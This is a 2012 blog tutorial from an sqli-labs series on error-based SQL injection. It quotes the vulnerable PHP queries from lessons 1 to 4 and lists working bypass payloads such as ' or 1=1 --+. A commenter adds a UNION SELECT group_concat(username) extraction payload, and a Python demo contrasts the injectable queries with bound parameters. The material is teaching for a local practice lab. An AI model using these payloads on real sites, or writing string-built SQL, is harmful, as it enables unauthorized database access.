Friday, June 22, 2012

SQLI-LABS SERIES PART - 2,3,4,5


CAUTION: This is for educational purposes only. Please do not use the skills you gain from following the video lessons or this blog to harm or test sites on the internet for which you do not have permission. Doing so is illegal. I do not support this sort of activity and would advise you all to stay away from the same... If you do so you are solely responsible for your actions; you have been warned.



In the first part of the series we downloaded the PHP code files and installed them on the BackTrack machine or under XAMPP on Windows.
In today's lesson we start with error-based SQL injection.

What exactly is SQL injection?
SQL injection is a technique often used to attack databases through a website. It is a code injection technique that exploits a security vulnerability in a website's software. -- source: Wikipedia

How does SQL injection happen?
Let us take the example of Less-1: the webpage takes an input through the parameter "id" and passes it on to the backend database by constructing a query at run time, with the input pasted into the query text.

ERROR BASED SQL INJECTION

Error-based SQL injection is called so because the database errors are displayed on the web page, and those errors are used to discover the structure of the underlying query.


Less-1 
If you open the source of index.php under Less-1, you will see on line 29:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Here the variable $id is wrapped in single quotes: id = ' $id '. When a tester provides ' or 1=1, the condition becomes id = ' ' or 1=1 ', which the database evaluates as id = empty string OR (one equals one). The input has escaped the data boundary and is now executed as code. The quote left over on the right side still has to be dealt with, either by balancing it or by commenting out the remaining part of the query.

  • ' or '1'='1 will work nicely.   id = ' ' or '1'='1 ' LIMIT 0,1
  • ' or 1=1 --+ will also work.    id = ' ' or 1=1 --+ ' commented out
  • ' or 1=1 # will also work.      id = ' ' or 1=1 # ' commented out

Less-2, line numbers 31 and 32
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • or 1=1 will work nicely.        id = or 1=1 LIMIT 0,1
  • or 1=1 --+ will also work.      id = or 1=1 --+
  • or 1=1 # will also work.        id = or 1=1 #

Less-3, line number 31
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  • ') or ('1')=('1 will work nicely.   id = (' ') or ('1')=('1 ') LIMIT 0,1
  • ') or 1=1 --+ will also work.       id = (' ') or 1=1 --+ ') commented out
  • ') or 1=1 # will also work.         id = (' ') or 1=1 # ') commented out


Less-4, line numbers 28 and 29
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

  • ") or ("1")=("1 will work nicely.   id = (" ") or ("1")=("1 ") LIMIT 0,1
  • ") or 1=1 --+ will also work.       id = (" ") or 1=1 --+ ") commented out
  • ") or 1=1 # will also work.         id = (" ") or 1=1 # ") commented out

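The four query shapes from Less-1 to Less-4, rebuilt as an added example (not part of the original post and not the sqli-labs code) over an in-memory SQLite table, with a bound-parameter lookup beside them for contrast. The table rows and the leading 99 given to Less-2 are constructed for the demo; Less-4 is listed for completeness but not run, since its "..." quoting is a MySQL behaviour.

```python
import sqlite3

# Constructed sample rows for the demo, not the lab's seed data.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# The query text of each lesson, assembled by string substitution exactly as
# the PHP does. Less-4 depends on MySQL reading "..." as a string literal, so
# it is shown here but only exercised against MySQL.
TEMPLATES = {
    "Less-1": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
    "Less-4": 'SELECT * FROM users WHERE id=("{id}") LIMIT 0,1',
}

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def build_query(lesson, user_id):
    """Return the SQL the lesson's PHP would send for this id value."""
    return TEMPLATES[lesson].format(id=user_id)

def vulnerable_lookup(conn, lesson, user_id):
    """String-built query: quotes in user_id become part of the SQL itself."""
    return conn.execute(build_query(lesson, user_id)).fetchone()

def safe_lookup(conn, user_id):
    """Bound parameter: the value never enters the SQL text, so a quote in it
    is just a character that is compared against the id column."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                        (user_id,)).fetchone()

if __name__ == "__main__":
    conn = make_db()
    # The inputs listed above for each lesson; Less-2 gets a constructed
    # leading value (99) so that the numeric form parses.
    for lesson, payload in [("Less-1", "' or '1'='1"),
                            ("Less-2", "99 or 1=1"),
                            ("Less-3", "') or ('1')=('1")]:
        print(lesson, "->", build_query(lesson, payload))
        print("   row returned:", vulnerable_lookup(conn, lesson, payload))
    print("bound parameter, same input:", safe_lookup(conn, "' or '1'='1"))
```

The string-built queries each hand back the first user although no id matched, while the bound-parameter version returns nothing for the same input: this is the fix to apply in the PHP as well.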
Hope you all like it.

5 comments:

  1. In lesson 4 you used the statement:
    hxxp://localhost/sqli-labs/Less-1/?id=99' union%20select 1, group_concat(username),3 from users--+

    Why can we remove the 2 for the second column and not the 3 for the third?

    Then later in the video you show another group_concat() you are able to remove the "3". Why is this?

    Replies
    1. I think you meant video 4. Well, if the web application responds to our requests and we see some columns interacting with our union statements, then any of those columns can be chosen to dump the output. In our example the query is dumping columns 2 and 3 on screen, therefore any of them can be used to dump info to the screen. I just chose 2 randomly.

  2. Wow, the videos being made by you are so simple & understandable that any kid can start exploiting the vulnerability (SQL Injection)... I have been in the Cyber Security Industry for the past 3 yrs and I have never seen such wonderful & most importantly "Understandable" videos.. Really Appreciable man... I am afraid what if the crime rate increases because of these videos man... Keep it safe and be safe...

  3. In video 3, where you are showing Less-4:
    $id = '"' . $id . '"';

    But in the video, when you use 1', it doesn't break. Why?
